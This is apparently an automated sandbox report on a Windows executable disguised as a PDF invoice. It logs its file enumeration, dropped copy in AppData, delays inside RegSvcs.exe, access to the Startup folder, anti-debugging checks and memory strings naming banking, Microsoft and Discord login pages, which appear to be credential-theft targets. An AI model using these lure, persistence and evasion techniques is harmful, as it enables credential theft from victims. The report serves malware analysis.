Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Code function: 7_2_00B6698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	7_2_00B6698F
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Code function: 7_2_00B5D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	7_2_00B5D076
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Code function: 7_2_00B5D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	7_2_00B5D3A9
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Code function: 7_2_00B69642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	7_2_00B69642
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Code function: 7_2_00B6979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	7_2_00B6979D
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Code function: 7_2_00B5DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	7_2_00B5DBBE
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Code function: 7_2_00B69B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	7_2_00B69B2B
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Code function: 7_2_00B65C97 FindFirstFileW,FindNextFileW,FindClose,	7_2_00B65C97

Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe

Code function: 0_2_004142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_004142DE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599563	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599452	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599339	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598999	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598840	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598637	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598484	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598312	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598203	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598094	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597984	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597874	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597747	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597625	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597516	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597406	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597297	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597188	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597077	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596968	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596851	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596734	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596625	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596516	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596391	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596281	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596163	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595931	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595724	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595594	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595484	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595374	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595266	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595156	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595047	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594938	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594813	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594688	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594469	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594344	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593797	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593682	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599889	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599344	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599087	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598922	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598778	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598658	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598532	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598407	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598295	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598185	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598078	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597969	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596160	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595822	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595594	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593610	Jump to behavior

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\	Jump to behavior

Source: RegSvcs.exe, 0000000B.00000002.2529344457.0000000003513000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
Source: RegSvcs.exe, 0000000B.00000002.2529344457.0000000003513000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696501413o
Source: RegSvcs.exe, 0000000B.00000002.2529344457.0000000003513000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696501413h
Source: RegSvcs.exe, 0000000B.00000002.2529344457.0000000003513000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
Source: RegSvcs.exe, 0000000B.00000002.2529344457.0000000003832000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696501413
Source: RegSvcs.exe, 0000000B.00000002.2529344457.0000000003513000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696501413j
Source: RegSvcs.exe, 0000000B.00000002.2529344457.0000000003513000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - COM.HKVMware20,11696501413
Source: RegSvcs.exe, 0000000B.00000002.2529344457.0000000003832000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
Source: RegSvcs.exe, 0000000B.00000002.2529344457.0000000003832000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696501413
Source: RegSvcs.exe, 0000000B.00000002.2529344457.0000000003513000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696501413
Source: RegSvcs.exe, 0000000B.00000002.2529344457.0000000003513000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
Source: RegSvcs.exe, 0000000B.00000002.2529344457.0000000003513000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696501413t
Source: RegSvcs.exe, 0000000B.00000002.2529344457.0000000003832000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - COM.HKVMware20,11696501413
Source: RegSvcs.exe, 0000000B.00000002.2529344457.0000000003513000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - HKVMware20,11696501413]
Source: RegSvcs.exe, 0000000B.00000002.2529344457.0000000003832000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - HKVMware20,11696501413]
Source: RegSvcs.exe, 0000000B.00000002.2529344457.0000000003832000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696501413\|UE
Source: RegSvcs.exe, 0000000B.00000002.2529344457.0000000003832000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696501413j
Source: RegSvcs.exe, 0000000B.00000002.2529344457.0000000003832000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696501413x
Source: RegSvcs.exe, 0000000B.00000002.2529344457.0000000003513000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696501413
Source: RegSvcs.exe, 0000000B.00000002.2529344457.0000000003513000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactiveuserers.comVMware20,11696501413}
Source: RegSvcs.exe, 0000000B.00000002.2529344457.0000000003832000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696501413}
Source: RegSvcs.exe, 0000000B.00000002.2529344457.0000000003513000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696501413x
Source: RegSvcs.exe, 0000000B.00000002.2529344457.0000000003513000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696501413t
Source: wscript.exe, 00000009.00000002.1393086701.000001C58E063000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}u
Source: RegSvcs.exe, 0000000B.00000002.2529344457.0000000003832000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696501413
Source: RegSvcs.exe, 0000000B.00000002.2529344457.0000000003513000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactiveuserers.comVMware20,11696501413
Source: RegSvcs.exe, 0000000B.00000002.2529344457.0000000003513000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696501413
Source: RegSvcs.exe, 0000000B.00000002.2529344457.0000000003832000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696501413
Source: RegSvcs.exe, 0000000B.00000002.2529344457.0000000003832000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696501413x
Source: RegSvcs.exe, 0000000B.00000002.2529344457.0000000003832000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696501413s
Source: RegSvcs.exe, 0000000B.00000002.2529344457.0000000003832000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696501413f
Source: RegSvcs.exe, 0000000B.00000002.2529344457.0000000003513000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696501413
Source: RegSvcs.exe, 0000000B.00000002.2529344457.0000000003832000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactiveuserers.comVMware20,11696501413
Source: RegSvcs.exe, 0000000B.00000002.2529344457.0000000003513000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696501413\|UE
Source: RegSvcs.exe, 0000000B.00000002.2529344457.0000000003832000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
Source: RegSvcs.exe, 0000000B.00000002.2529344457.0000000003513000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696501413x
Source: RegSvcs.exe, 0000000B.00000002.2529344457.0000000003832000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696501413x
Source: RegSvcs.exe, 0000000B.00000002.2529344457.0000000003832000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696501413
Source: RegSvcs.exe, 0000000B.00000002.2529344457.0000000003832000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696501413h
Source: RegSvcs.exe, 0000000B.00000002.2529344457.0000000003513000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696501413}
Source: RegSvcs.exe, 0000000B.00000002.2529344457.0000000003832000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactiveuserers.co.inVMware20,11696501413d
Source: RegSvcs.exe, 0000000B.00000002.2529344457.0000000003832000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413
Source: RegSvcs.exe, 0000000B.00000002.2529344457.0000000003513000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696501413x
Source: RegSvcs.exe, 0000000B.00000002.2524807709.0000000000688000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: RegSvcs.exe, 00000008.00000002.2524850869.000000000103B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlld
Source: RegSvcs.exe, 0000000B.00000002.2529344457.0000000003513000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696501413s
Source: RegSvcs.exe, 0000000B.00000002.2529344457.0000000003832000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696501413t
Source: RegSvcs.exe, 0000000B.00000002.2529344457.0000000003513000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
Source: RegSvcs.exe, 0000000B.00000002.2529344457.0000000003832000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696501413t
Source: RegSvcs.exe, 0000000B.00000002.2529344457.0000000003832000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - EU WestVMware20,11696501413n
Source: RegSvcs.exe, 0000000B.00000002.2529344457.0000000003832000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactiveuserers.comVMware20,11696501413}
Source: RegSvcs.exe, 0000000B.00000002.2529344457.0000000003513000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696501413u
Source: RegSvcs.exe, 0000000B.00000002.2529344457.0000000003513000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
Source: RegSvcs.exe, 0000000B.00000002.2529344457.0000000003513000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - EU WestVMware20,11696501413n
Source: RegSvcs.exe, 0000000B.00000002.2529344457.0000000003832000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696501413u
Source: RegSvcs.exe, 0000000B.00000002.2529344457.0000000003832000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
Source: RegSvcs.exe, 0000000B.00000002.2529344457.0000000003832000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
Source: RegSvcs.exe, 0000000B.00000002.2529344457.0000000003832000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
Source: RegSvcs.exe, 0000000B.00000002.2529344457.0000000003513000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413
Source: RegSvcs.exe, 0000000B.00000002.2529344457.0000000003513000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactiveuserers.co.inVMware20,11696501413d
Source: RegSvcs.exe, 0000000B.00000002.2529344457.0000000003832000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
Source: RegSvcs.exe, 0000000B.00000002.2529344457.0000000003513000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696501413
Source: RegSvcs.exe, 0000000B.00000002.2529344457.0000000003513000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
Source: RegSvcs.exe, 0000000B.00000002.2529344457.0000000003832000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696501413o
Source: RegSvcs.exe, 0000000B.00000002.2529344457.0000000003513000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696501413f

Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe

Code function: 0_2_0048EAA2 BlockInput,

0_2_0048EAA2

Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe

Code function: 0_2_00442622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00442622

Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe

Code function: 0_2_004142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_004142DE

Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Code function: 0_2_00434CE8 mov eax, dword ptr fs:[00000030h]	0_2_00434CE8
Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Code function: 0_2_0122A7B0 mov eax, dword ptr fs:[00000030h]	0_2_0122A7B0
Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Code function: 0_2_0122BE00 mov eax, dword ptr fs:[00000030h]	0_2_0122BE00
Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Code function: 0_2_0122BE60 mov eax, dword ptr fs:[00000030h]	0_2_0122BE60
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Code function: 7_2_00B14CE8 mov eax, dword ptr fs:[00000030h]	7_2_00B14CE8
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Code function: 7_2_019CA3E0 mov eax, dword ptr fs:[00000030h]	7_2_019CA3E0
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Code function: 7_2_019CBA90 mov eax, dword ptr fs:[00000030h]	7_2_019CBA90
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Code function: 7_2_019CBA30 mov eax, dword ptr fs:[00000030h]	7_2_019CBA30
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Code function: 10_2_01AA0028 mov eax, dword ptr fs:[00000030h]	10_2_01AA0028
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Code function: 10_2_01A9E978 mov eax, dword ptr fs:[00000030h]	10_2_01A9E978
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Code function: 10_2_01A9FFC8 mov eax, dword ptr fs:[00000030h]	10_2_01A9FFC8

